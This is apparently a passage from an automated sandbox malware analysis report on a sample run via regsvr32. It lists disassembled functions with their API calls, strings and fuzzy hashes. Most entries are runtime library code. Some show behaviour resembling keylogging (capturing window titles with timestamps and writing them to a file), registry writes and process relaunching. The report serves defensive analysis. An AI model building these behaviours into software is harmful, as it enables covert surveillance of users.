Opcode Fuzzy Hash: d53289f82b987d99488ffd486f5e8e9424002f469d181d04e2350c7ea1fe77c1
Instruction Fuzzy Hash: A6313732A90B6598EB04DBA0E8442EC3375F74474CF945526DE1D57B18EF30C216C780

Function 02881560 Relevance: 10.6, APIs: 7, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 02881579
_errno.LIBCMT ref: 02881581
_close_nolock.LIBCMT ref: 028815D8

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: __doserrno_close_nolock_errno
String ID:
API String ID: 186997739-0
Opcode ID: d4e42670deded1a41872dc57e652bbdc50800f1b388844c8c982070653914a45
Instruction ID: 9ac4d96a67838c7dc5f3f29edb8a0a9825ad9d15f167574b5644e30ed738d96b
Opcode Fuzzy Hash: d4e42670deded1a41872dc57e652bbdc50800f1b388844c8c982070653914a45
Instruction Fuzzy Hash: CC11033D519A444EE704BB68D89936C76D2EF81324F1A062CD01FC72E1DA74C8428B63

Function 02E63460 Relevance: 10.6, APIs: 7, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 02E63483
_errno.LIBCMT ref: 02E6348B

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 18e84dbfee4e45401bde94adaa049da0b512f4016e2074da3143f09c66c3302d
Instruction ID: 0dbf48033c9f212fbf07cf8c42c8b1c34cd120aba2e7fd7a33013b2821225004
Opcode Fuzzy Hash: 18e84dbfee4e45401bde94adaa049da0b512f4016e2074da3143f09c66c3302d
Instruction Fuzzy Hash: 431106723E069046D716AF65D84C33DB752AB81BE6F8AE145EF150B3D0CBB88841CB60

Function 02E63A34 Relevance: 10.6, APIs: 7, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 02E63A57
_errno.LIBCMT ref: 02E63A5F

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 86a5edae899ae3c1e95562a3141e97825a2d4e34b8035855c9b3c82b72936b35
Instruction ID: 76bc1a56ffb1883418bfe005714a85482f6c3a3597614570a8b75712b5506d2c
Opcode Fuzzy Hash: 86a5edae899ae3c1e95562a3141e97825a2d4e34b8035855c9b3c82b72936b35
Instruction Fuzzy Hash: 8511E4223E069045CA06AF55D95837D7752AB80FF6F4AE74AEE380B3D0CB798841CB20

Function 02E63540 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E63559
FlushFileBuffers.KERNEL32 ref: 02E635BC
GetLastError.KERNEL32 ref: 02E635C6
__doserrno.LIBCMT ref: 02E635D6
_errno.LIBCMT ref: 02E635DD

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno$BuffersErrorFileFlushLast__doserrno
String ID:
API String ID: 1845094721-0
Opcode ID: 6cb1097625330db8c14f65dc00d311e544f89a42f5e59361ee9e46fa344e60e4
Instruction ID: 308807bfa813213b1c6af8c78e1d3d20ca2169bf1dbe94729a02922235a31004
Opcode Fuzzy Hash: 6cb1097625330db8c14f65dc00d311e544f89a42f5e59361ee9e46fa344e60e4
Instruction Fuzzy Hash: 0E1100617D47C086DB05AF69E98C33D6B52AB80FD5F49B669EA260B390CF78C440CB24

Function 02E51EC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringtimeCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 02E51EEF
GetWindowTextW.USER32 ref: 02E51F0C
lstrlenW.KERNEL32 ref: 02E51F46
GetLocalTime.KERNEL32 ref: 02E51F55
wsprintfW.USER32 ref: 02E51FA5

Part of subcall function 02E51E00: WaitForSingleObject.KERNEL32 ref: 02E51E17
Part of subcall function 02E51E00: CreateFileW.KERNEL32 ref: 02E51E49
Part of subcall function 02E51E00: SetFilePointer.KERNEL32 ref: 02E51E6E
Part of subcall function 02E51E00: lstrlenW.KERNEL32 ref: 02E51E77
Part of subcall function 02E51E00: WriteFile.KERNEL32 ref: 02E51E95
Part of subcall function 02E51E00: CloseHandle.KERNEL32 ref: 02E51E9E
Part of subcall function 02E51E00: ReleaseMutex.KERNEL32 ref: 02E51EAB

Strings

[, xrefs: 02E51F9E

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: File$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
String ID: [
API String ID: 3163932117-4056885943
Opcode ID: bd11379160462120774f09f7b187f9a014c50a8c89d2790cda105e9129980a75
Instruction ID: 3512e395ee989f549437b6a1ed99a81169c577e97b60cfbcb7ec9c8976a42726
Opcode Fuzzy Hash: bd11379160462120774f09f7b187f9a014c50a8c89d2790cda105e9129980a75
Instruction Fuzzy Hash: BD317E31268A90C2E750DF22F85836AB7A5F784744F409016E9CE46A64EF3DC159CF90

Function 02E63BD4 Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 02E63BED
_errno.LIBCMT ref: 02E63BF5
_close_nolock.LIBCMT ref: 02E63C4C

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: __doserrno_close_nolock_errno
String ID:
API String ID: 186997739-0
Opcode ID: 338a92123b176fe84b8433c97561ad7ed6b063f42bea373834fe5852735bb2e8
Instruction ID: aa30b25a7900030dd426353f0b60549b28d85297b90b79f34916140c9a217298
Opcode Fuzzy Hash: 338a92123b176fe84b8433c97561ad7ed6b063f42bea373834fe5852735bb2e8
Instruction Fuzzy Hash: 3311E9226D06C045D6056F259D8C37C6752A780BE1F55F555BA1A077D5CB748880C734

Function 02E60E84 Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E60EA8
_errno.LIBCMT ref: 02E60EC1
write_char.LIBCMT ref: 02E60ED7
_errno.LIBCMT ref: 02E60EE5
write_char.LIBCMT ref: 02E60EFA
_errno.LIBCMT ref: 02E60F03
_errno.LIBCMT ref: 02E60F0D

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno$write_char
String ID:
API String ID: 1772936973-0
Opcode ID: 871f355d671030dc6432d9a23ab7b6e38f30107320b972de84d7d94d25281080
Instruction ID: bcd63d69ca4eed3572de15304dcd0b8cfb982dd599fff7fe6811cc4ad314779b
Opcode Fuzzy Hash: 871f355d671030dc6432d9a23ab7b6e38f30107320b972de84d7d94d25281080
Instruction Fuzzy Hash: 1D1188725E0BA08ADB206F92D40837976A1F794FD4F88E025EF540B784CBB8D481CB51

Function 02E5C7C8 Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E5C7EC
_errno.LIBCMT ref: 02E5C805
write_char.LIBCMT ref: 02E5C81A
_errno.LIBCMT ref: 02E5C827
write_char.LIBCMT ref: 02E5C839
_errno.LIBCMT ref: 02E5C842
_errno.LIBCMT ref: 02E5C84C

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno$write_char
String ID:
API String ID: 1772936973-0
Opcode ID: 4e5a875947b43d510ab27010ab14576f87d5b69a94ba14807e221e2687d3d606
Instruction ID: ea107bf0d60f93ba7eaefd55360de215d9a3555c44709678345014f13b23837f
Opcode Fuzzy Hash: 4e5a875947b43d510ab27010ab14576f87d5b69a94ba14807e221e2687d3d606
Instruction Fuzzy Hash: 8A11AC324B0BE0CACB206F62941036936A1F398F98F69F012EF940B744CB7CE481CB61

Function 02E48BE0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 02E48C0B
GetCommandLineW.KERNEL32 ref: 02E48C11
GetStartupInfoW.KERNEL32 ref: 02E48C1F
CreateProcessW.KERNEL32 ref: 02E48C62
ExitProcess.KERNEL32 ref: 02E48C6B

Strings

, xrefs: 02E48C56

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
String ID:
API String ID: 3421218197-3916222277
Opcode ID: ee7650ada655a41ad3d8abafd2266b15cab2f850138d348df1a1cd45a91815c4
Instruction ID: 611ab7eeb72cef7678e199c008cd7c9bf11200691c1a89f2b21aba1f7220f0d5
Opcode Fuzzy Hash: ee7650ada655a41ad3d8abafd2266b15cab2f850138d348df1a1cd45a91815c4
Instruction Fuzzy Hash: 1301EC32258BC582DB608B64F89D74AB7A4F7947D4F505526E68B43F68DF7CC1498B00

Function 02E51E00 Relevance: 10.5, APIs: 7, Instructions: 40filesynchronizationstringCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 02E51E17
CreateFileW.KERNEL32 ref: 02E51E49
SetFilePointer.KERNEL32 ref: 02E51E6E
lstrlenW.KERNEL32 ref: 02E51E77
WriteFile.KERNEL32 ref: 02E51E95
CloseHandle.KERNEL32 ref: 02E51E9E
ReleaseMutex.KERNEL32 ref: 02E51EAB

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
String ID:
API String ID: 4202892810-0
Opcode ID: e7892ef0c60a8620ab59d393f68777d807ece2b1662eb29eea33fc2896f8ec93
Instruction ID: b386e1bb1a1d00643642920ebbe8bc203950e81d1b93e5ca7955c6c20f43f189
Opcode Fuzzy Hash: e7892ef0c60a8620ab59d393f68777d807ece2b1662eb29eea33fc2896f8ec93
Instruction Fuzzy Hash: 7B110972258A8082E7108F62F95C75A7760F798BF8F444211DAAB43FA4CF7CC449CB10

Function 02E4E67F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 02E4E6A6
RegDeleteValueW.ADVAPI32 ref: 02E4E6B7
RegSetValueExW.ADVAPI32 ref: 02E4E6DE
RegCloseKey.ADVAPI32 ref: 02E4E6E8

Strings

IpDatespecial, xrefs: 02E4E6B0, 02E4E6C1
Console, xrefs: 02E4E68A

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Value$CloseDeleteOpen
String ID: Console$IpDatespecial
API String ID: 3183427449-1840232981
Opcode ID: 1998c3c541e6b13509c0f1d0a8d7f92d98846318bf4c898897b1f07a1e6dd135
Instruction ID: 91ffb8d555b24283b7747753dab35f6b5d350bffa8a256deb87f954444c3b0d4
Opcode Fuzzy Hash: 1998c3c541e6b13509c0f1d0a8d7f92d98846318bf4c898897b1f07a1e6dd135
Instruction Fuzzy Hash: 8D012C7635AA81C6EB61CB25F8587983770F799BE8F445112CE9E03A94CF38C189C704

Function 028831A8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 028831C7

Part of subcall function 0287DA94: _getptd.LIBCMT ref: 0287DA98

_getptd.LIBCMT ref: 028831D9
_getptd.LIBCMT ref: 028831E7

Strings

RCC, xrefs: 028831AF
MOC, xrefs: 028831B7
csm, xrefs: 028831BF

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _getptd
String ID: MOC$RCC$csm
API String ID: 3186804695-2671469338
Opcode ID: d0c629851adb83669a1057044e1c73a61abea7eb16c4708499e842e3cc9a1464
Instruction ID: c9d055ddf973d445f1c5ce081f96a06e7d6135efe0247922921be463d039dad0
Opcode Fuzzy Hash: d0c629851adb83669a1057044e1c73a61abea7eb16c4708499e842e3cc9a1464
Instruction Fuzzy Hash: BFE01A3C5121048EC7557B6884493B472A2FF19B0EF4A56E9984CCB221DBBC89D08F53

Function 028C38B5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 028C38D4

Part of subcall function 028BE1A1: _getptd.LIBCMT ref: 028BE1A5

_getptd.LIBCMT ref: 028C38E6
_getptd.LIBCMT ref: 028C38F4

Strings

RCC, xrefs: 028C38BC
csm, xrefs: 028C38CC
MOC, xrefs: 028C38C4

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: _getptd
String ID: MOC$RCC$csm
API String ID: 3186804695-2671469338
Opcode ID: d0c629851adb83669a1057044e1c73a61abea7eb16c4708499e842e3cc9a1464
Instruction ID: fd707ad0d7263315baefb51170b5b418353e1105981a1ce096c530147e347605
Opcode Fuzzy Hash: d0c629851adb83669a1057044e1c73a61abea7eb16c4708499e842e3cc9a1464
Instruction Fuzzy Hash: 86E0123C618105CED766776C85093F435A1FF1C30AF6A90EAC458CA220D7BD84C18F53

Function 02E58C18 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 20COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 02E58C37

Part of subcall function 02E5DF90: _amsg_exit.LIBCMT ref: 02E5DFA6

Part of subcall function 02E626F8: _getptd.LIBCMT ref: 02E626FC

_getptd.LIBCMT ref: 02E58C49
_getptd.LIBCMT ref: 02E58C57

Strings

MOC, xrefs: 02E58C27
RCC, xrefs: 02E58C1F
csm, xrefs: 02E58C2F

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _getptd$_amsg_exit
String ID: MOC$RCC$csm
API String ID: 2610988583-2671469338
Opcode ID: e672e4323665b16ea60b3fb528af4179eb2c0c48703903788b3e2e50e937f095
Instruction ID: 12eb0481e0d9116d29e49d4729257a5806afa2af3a0563dab3dfb6f3d466dd87
Opcode Fuzzy Hash: e672e4323665b16ea60b3fb528af4179eb2c0c48703903788b3e2e50e937f095
Instruction Fuzzy Hash: C8E012369A2124CEC7156B6684443EC3662F79870AF86F5759A4446320C7BC44C48F23

Function 0287F330 Relevance: 9.2, APIs: 6, Instructions: 164COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 0287F34F

Part of subcall function 0287EF6C: _getptd.LIBCMT ref: 0287EF76

Part of subcall function 0287C020: malloc.LIBCMT ref: 0287C04B

free.LIBCMT ref: 0287F3DA

Part of subcall function 02879030: _errno.LIBCMT ref: 02879050

_lock.LIBCMT ref: 0287F40A
free.LIBCMT ref: 0287F4AD
free.LIBCMT ref: 0287F4D9
_errno.LIBCMT ref: 0287F4DE

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: free$_errno_getptd$_lockmalloc
String ID:
API String ID: 1369581901-0
Opcode ID: 46c6df5e477d7497093a289866e64b8d4491e61b26bae6d79cd5a01dca7a1c2a
Instruction ID: bd1b3b065ac49c68eb9ebd48ec0408a34edd387738b53ad60383e4544465ed22
Opcode Fuzzy Hash: 46c6df5e477d7497093a289866e64b8d4491e61b26bae6d79cd5a01dca7a1c2a
Instruction Fuzzy Hash: C351A23C618A444FDB54EF2D988076977E2FB98318F2481BDC95EC7A56DB34D842CB82

Function 028BFA3D Relevance: 9.2, APIs: 6, Instructions: 164COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 028BFA5C

Part of subcall function 028BF679: _getptd.LIBCMT ref: 028BF683

Part of subcall function 028BC72D: malloc.LIBCMT ref: 028BC758

free.LIBCMT ref: 028BFAE7

Part of subcall function 028B973D: _errno.LIBCMT ref: 028B975D

_lock.LIBCMT ref: 028BFB17
free.LIBCMT ref: 028BFBBA
free.LIBCMT ref: 028BFBE6
_errno.LIBCMT ref: 028BFBEB

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: free$_errno_getptd$_lockmalloc
String ID:
API String ID: 1369581901-0
Opcode ID: a3a26e323750022a5642fc9cfd1b11b8c9e03ca5b3c3789877fa1a91f1119499
Instruction ID: 380dc99b106918320c5c899842d47bb86fd459948e0f3397086df434f7c77415
Opcode Fuzzy Hash: a3a26e323750022a5642fc9cfd1b11b8c9e03ca5b3c3789877fa1a91f1119499
Instruction Fuzzy Hash: FD51053C618A484FD766DF2C98907E977E2FF58314F2041ADD99EC3B56DB3498428B42

Function 028717C0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 028717F5
malloc.LIBCMT ref: 02871861

Part of subcall function 02879070: _FF_MSGBANNER.LIBCMT ref: 028790A0
Part of subcall function 02879070: _callnewh.LIBCMT ref: 028790DE
Part of subcall function 02879070: _errno.LIBCMT ref: 028790E9
Part of subcall function 02879070: _errno.LIBCMT ref: 028790F4

free.LIBCMT ref: 0287188A

Part of subcall function 02879030: _errno.LIBCMT ref: 02879050

Strings

d, xrefs: 02871901
d, xrefs: 02871935
d, xrefs: 0287190B

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _errno$malloc$_callnewhfree
String ID: d$d$d
API String ID: 1789327305-1898527202
Opcode ID: e9053c7a343c0b83d9d295b64127538e78e5f548f8b7e2bc9a1aaa569d59c23e
Instruction ID: e70bcc667cc5bfb2aa385ac5f0d300747cce2b24e5dbd4a74b52dc57080baa85
Opcode Fuzzy Hash: e9053c7a343c0b83d9d295b64127538e78e5f548f8b7e2bc9a1aaa569d59c23e
Instruction Fuzzy Hash: D751B2B4424A198FDB90DF19D088B957BE4FB58704F5582BAD80CCB26ADB74C884CFA1

Function 028B1ECD Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 028B1F02
malloc.LIBCMT ref: 028B1F6E

Part of subcall function 028B977D: _FF_MSGBANNER.LIBCMT ref: 028B97AD
Part of subcall function 028B977D: _callnewh.LIBCMT ref: 028B97EB
Part of subcall function 028B977D: _errno.LIBCMT ref: 028B97F6
Part of subcall function 028B977D: _errno.LIBCMT ref: 028B9801

free.LIBCMT ref: 028B1F97

Part of subcall function 028B973D: _errno.LIBCMT ref: 028B975D

Strings

d, xrefs: 028B200E
d, xrefs: 028B2042
d, xrefs: 028B2018

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: _errno$malloc$_callnewhfree
String ID: d$d$d
API String ID: 1789327305-1898527202
Opcode ID: 1f798697604a03fc75b9b18e084cac3ea39fc0a6f99398ec1fcba1ef6a5bdc0e
Instruction ID: 2babff40f6d396eee965f287ba427bc49b102c6fcc5624f7adc14759f5030263
Opcode Fuzzy Hash: 1f798697604a03fc75b9b18e084cac3ea39fc0a6f99398ec1fcba1ef6a5bdc0e
Instruction Fuzzy Hash: 7651C2B4414A198FDB91DF18D088B957BE4FF58700F5582AA980CCF36ADBB4C844CFA1

Function 02E5EDF0 Relevance: 9.1, APIs: 6, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 02E5EE0F

Part of subcall function 02E5DF90: _amsg_exit.LIBCMT ref: 02E5DFA6

Part of subcall function 02E5EA2C: _getptd.LIBCMT ref: 02E5EA36
Part of subcall function 02E5EA2C: _amsg_exit.LIBCMT ref: 02E5EAD3

Part of subcall function 02E5EAE8: GetOEMCP.KERNEL32 ref: 02E5EB12

Part of subcall function 02E5A7E0: malloc.LIBCMT ref: 02E5A80B
Part of subcall function 02E5A7E0: Sleep.KERNEL32 ref: 02E5A81E

free.LIBCMT ref: 02E5EE9A

Part of subcall function 02E55280: HeapFree.KERNEL32 ref: 02E55296
Part of subcall function 02E55280: _errno.LIBCMT ref: 02E552A0
Part of subcall function 02E55280: GetLastError.KERNEL32 ref: 02E552A8

_lock.LIBCMT ref: 02E5EECA
free.LIBCMT ref: 02E5EF6D
free.LIBCMT ref: 02E5EF99
_errno.LIBCMT ref: 02E5EF9E

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: free$_amsg_exit_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
String ID:
API String ID: 3894533514-0
Opcode ID: 2854a5756f7ba83f048a3981276ffac91aab162a3a0ca66450eb40d5492f030e
Instruction ID: aba2428cfbbf846445ad5d463061ee551b17c4278748fe6e5a228f4eb54bfcfe
Opcode Fuzzy Hash: 2854a5756f7ba83f048a3981276ffac91aab162a3a0ca66450eb40d5492f030e
Instruction Fuzzy Hash: E0412B362A069086D714DF66E44036EB7A6F784B98F5CE116EE9E47358CF7CC542C720

Function 02E41790 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 02E417C5
malloc.LIBCMT ref: 02E41831

Part of subcall function 02E552C0: _FF_MSGBANNER.LIBCMT ref: 02E552F0
Part of subcall function 02E552C0: HeapAlloc.KERNEL32 ref: 02E55315
Part of subcall function 02E552C0: _callnewh.LIBCMT ref: 02E5532E
Part of subcall function 02E552C0: _errno.LIBCMT ref: 02E55339
Part of subcall function 02E552C0: _errno.LIBCMT ref: 02E55344

free.LIBCMT ref: 02E4185A

Part of subcall function 02E55280: HeapFree.KERNEL32 ref: 02E55296
Part of subcall function 02E55280: _errno.LIBCMT ref: 02E552A0
Part of subcall function 02E55280: GetLastError.KERNEL32 ref: 02E552A8

Strings

d, xrefs: 02E418DB
d, xrefs: 02E418D1
d, xrefs: 02E41904

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno$Heapmalloc$AllocErrorFreeLast_callnewhfree
String ID: d$d$d
API String ID: 161857241-1898527202
Opcode ID: cfde20c8cbbf88260583b06dcbb63c88aa0b5bb1562ef053c57e5ef22d106b36
Instruction ID: d3157fa8046c2c81c7a08c3ac5f6879b6de24d8cab50395312256832a7f65c4b
Opcode Fuzzy Hash: cfde20c8cbbf88260583b06dcbb63c88aa0b5bb1562ef053c57e5ef22d106b36
Instruction Fuzzy Hash: D341E372151B90C9E7908F65E8443893BA8F748F88F59913AEB8C4B758EF79C494CB60

Function 0287D8F0 Relevance: 9.1, APIs: 6, Instructions: 82COMMONLIBRARYCODE

Download Yara Rule

APIs

_FF_MSGBANNER.LIBCMT ref: 0287D917

Part of subcall function 0287A56C: _set_error_mode.LIBCMT ref: 0287A575
Part of subcall function 0287A56C: _set_error_mode.LIBCMT ref: 0287A584

Part of subcall function 0287A30C: _set_error_mode.LIBCMT ref: 0287A351
Part of subcall function 0287A30C: _set_error_mode.LIBCMT ref: 0287A362

Part of subcall function 0287C020: malloc.LIBCMT ref: 0287C04B

_errno.LIBCMT ref: 0287D959
_lock.LIBCMT ref: 0287D96D
free.LIBCMT ref: 0287D990
_errno.LIBCMT ref: 0287D995

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _set_error_mode$_errno$_lockfreemalloc
String ID:
API String ID: 360200360-0
Opcode ID: 9c2658a345bce7dce076b7d317fbf23e7a87b99cd53fc0ce5dd5aaa652460754
Instruction ID: 570edf75c8f0a6c61c9e6d72f62f89161976eba91f5a2412a9511c3a2769ccda
Opcode Fuzzy Hash: 9c2658a345bce7dce076b7d317fbf23e7a87b99cd53fc0ce5dd5aaa652460754
Instruction Fuzzy Hash: D0216D3C619A0D8FEBA4BFA8D45476972E2FF89315F404429D44EC3195DB78D880CB92

Function 028BDFFD Relevance: 9.1, APIs: 6, Instructions: 82COMMONLIBRARYCODE

Download Yara Rule

APIs

_FF_MSGBANNER.LIBCMT ref: 028BE024

Part of subcall function 028BAC79: _set_error_mode.LIBCMT ref: 028BAC82
Part of subcall function 028BAC79: _set_error_mode.LIBCMT ref: 028BAC91

Part of subcall function 028BAA19: _set_error_mode.LIBCMT ref: 028BAA5E
Part of subcall function 028BAA19: _set_error_mode.LIBCMT ref: 028BAA6F

Part of subcall function 028BC72D: malloc.LIBCMT ref: 028BC758

_errno.LIBCMT ref: 028BE066
_lock.LIBCMT ref: 028BE07A
free.LIBCMT ref: 028BE09D
_errno.LIBCMT ref: 028BE0A2

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: _set_error_mode$_errno$_lockfreemalloc
String ID:
API String ID: 360200360-0
Opcode ID: a8d1a849ba7514cffc48d6dd0af4df3d36399617e27afee878002197c3e2bd21
Instruction ID: ce1507fbd3c420dbf59ebf3c39a9f61e696cb25dbe7e80bbef620c6cc2d9879b
Opcode Fuzzy Hash: a8d1a849ba7514cffc48d6dd0af4df3d36399617e27afee878002197c3e2bd21
